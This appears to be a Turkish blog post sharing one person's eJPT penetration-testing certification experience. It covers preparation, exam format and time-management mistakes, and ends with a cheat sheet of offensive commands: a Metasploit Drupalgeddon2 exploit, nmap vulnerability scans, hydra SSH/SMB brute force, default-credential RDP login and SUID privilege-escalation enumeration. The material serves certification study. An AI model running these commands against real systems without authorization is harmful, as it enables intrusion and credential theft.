eJPT Sınav Rehberi: Hazırlık Süreci, Araçlar ve Deneyimler
Merhaba! 22 Kasım’da girdiğim eJPT (eLearnSecurity Junior Penetration Tester) sınavını başarıyla tamamladım ve sertifikayı almaya hak kazandım. Bu yazıda, sınav sürecini, soru tarzlarını, zamanı nasıl yönettiğimi ve bu sertifikayı almak için nasıl hazırlanabileceğinizi detaylı bir şekilde ele alacağım. Kısacası eJPT Sınav Rehberi olarak detaylı bakacağız.
Sınav Öncesi Hazırlık
eJPT’ye hazırlık süreci, kaliteli ve kapsamlı bir eğitimle başlıyor. Aşağıdaki bağlantıyı kullanarak eğitim platformuna kaydolabilirsiniz:
➡️ eLearnSecurity eJPT Eğitimine Başlayın
- Fiyat: Aylık 59 dolar (iptal etmezseniz her ay otomatik yenilenir).
- Sınav Ücreti 200 dolar.
- İçerik: Eğitim; bilgi toplama, exploit tespiti, sızma testi araçlarının kullanımı gibi konuları kapsıyor.
Eğitim Detayları:
- Süre: 153 saat
- Bölüm Sayısı: 4
- Ders Sayısı: 12
- Videolar: 240
- Sınavlar: 200
- Laboratuvarlar: 93
Benim Deneyimim: Siber güvenlikle uzun yıllardır ilgileniyorum. Bu nedenle eğitimin çoğunu hızlıca geçtim ve 3-4 gün içinde sınava girdim. Ancak siber güvenlik bilginiz sınırlıysa veya yeni başlıyorsanız, eğitimi baştan sona detaylı bir şekilde tamamlamanızı kesinlikle öneririm.
İpucu: Eğitim dili İngilizce, ancak altyazı seçeneği mevcut. İngilizceniz yeterince iyi değilse altyazıyı aktif ederek çalışabilirsiniz.
eJPT Rehberi Sınav Süreci
Sınav hakkında genel bilgiler:
- Süre: 48 saat
- Soru Sayısı: 35
- 5 Flag Gönderme Sorusu
- 30 Teorik Soru (Makine içi işlemlerle ilgili)
- Tamamlama Sürem: Sınavı kesin olarak bitirmem 4 saat sürdü.
Hazırlık: Sınavdan önce Linkedin’de eJPT sertifikası alan 2-3 kişiyle iletişim kurarak Pivoting ve Port Forwarding gibi zorlandıkları konular üzerine bilgi alışverişinde bulundum. Bu bilgiler sınav sırasında oldukça faydalı oldu.
Deneyimim: Sınav sırasında dışarı çıkıp ailemle vakit geçirdim, bu süreyi stratejik olarak kullandım. Tavsiyem, internetinizin hızlı olduğu sabah veya öğlen saatlerinde sınava girmenizdir.
Sınavda Yaptığım Hatalar
- Not Alma Eksikliği:
- IP adresleri, portlar ve açıkları düzenli şekilde not almadım. Bu yüzden sürekli geriye dönerek tekrar kontrol yapmak zorunda kaldım ve yaklaşık 1 saat kaybettim.
- Sınav sırasında defter veya bir not alma uygulaması kullanarak IP adreslerini, portları ve açıkları mutlaka detaylı bir şekilde not alın.
- Flag Sorularında Karışıklık:
- Flag’leri bulduğumda hemen sisteme girmek yerine biriktirerek işlem yaptım. Bu yüzden bazı flag’leri karıştırdım ve 2 soruyu yanlış cevapladım.
- Flag bulduğunuz anda sisteme girin, asla biriktirmeyin.
Sınava Yardımı Olabilecek CTF Çözümlerim: CTF ÇÖZÜMLERİ
Sınav Soru Tarzları
Sınavda toplamda 6 makine verildi:
- WinServer-01
- WinServer-02
- WinServer-03
- WebServer-01
- FTPServer
- LinuxServer
Her makinenin bir IP adresi vardı ve bu IP adreslerini düzenli bir şekilde not almanız kritik önem taşıyor. Örneğin, hangi IP hangi server’ı temsil ediyor bunu karıştırmamak gerekiyor.
Başlangıç Adımları:
Metasploit ile Exploit Kullanımı:
# Metasploit başlatma:
msfconsole
# Drupal Exploit arama:
search drupal
# Exploit seçimi:
use exploit/unix/webapp/drupal_drupalgeddon2
# Hedef ayarları:
set RHOST <hedef_IP_adresi>
set TARGETURI /drupal
# Exploiti çalıştırma:
run
Sınav Tool Kullanımları
nmblookup: Hangi Server’a bağlı olduğunu ve detaylı isimleri keşfetmek için.
nmblookup -A
Nmap: İp aralığındaki tüm ip adreslerini ve portlarını detaylı tarayıp açıkları tespit etmek için.
nmap -sS -sV -p- --script vuln -T4 192.168.1.0/24
Nmap (80. Port Detaylı Tarama):
nmap -sS -sV -sC -p 80
Nmap (80. Port Güvenlik Açığı Tarama):
nmap -sS -sV --script vuln -p 80
XFreeRDP: Diğer makineye atlamak için.
xfreerdp /u:administrator /p:administrator /v:
Hydra (SMB Brute Force):
hydra -L root -P /usr/share/wordlists/rockyou.txt smb://192.168.100.0
Hydra (SSH Brute Force):
hydra -L root -P /usr/share/wordlists/rockyou.txt ssh://192.168.100.0
WPScan: WordPress CMS taramak için.
wpscan --url
Enum4linux: SMB ve NetBIOS protokollerine karşı bilgi toplamak için.
enum4linux
Nikto: Web sunucusunu taramak için.
nikto -h
Dirb: Tüm dizinleri tespit etmek için.
dirb
Dirb (Sadece .txt Dosyaları için):
dirb -X .txt
Linux Yetki Yükseltme: Gtfobins üzerinden araştırma yaparak yetki yükseltmek için.
find / -perm -u=s -type f 2>/dev/null
Windows Yetki Yükseltme:
whoami
whoami /priv
systeminfo